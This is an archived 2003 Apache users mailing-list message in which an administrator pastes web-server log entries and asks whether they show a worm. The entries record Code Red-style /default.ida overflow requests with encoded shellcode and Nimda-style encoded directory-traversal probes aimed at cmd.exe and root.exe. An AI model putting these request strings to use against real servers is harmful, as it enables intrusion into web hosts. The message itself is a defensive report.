httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "John Doumani" <fug...@attbi.com>
Subject [users@httpd] strange hits being logged -Worm?
Date Tue, 08 Apr 2003 23:41:20 GMT
Hello,

I have recently started seeing these lines of code repeated in my log files
for each virtual host. Is this a worm or some other attack on my server?

If so, what is the best way to protect the server from attack?

John


12.210.8.252 - - [07/Apr/2003:15:21:08 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a  HTTP/1.0" 404 -
12.210.23.223 - - [07/Apr/2003:15:58:39 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a  HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:07 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:11 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.8.252 - - [07/Apr/2003:16:18:19 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0
000%u00=a  HTTP/1.0" 404 -


<<><<>><<>><<>><<>><<>>
John e Doumani
fuguma@attbi.com

~Navigating the Web long before the Internet~



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message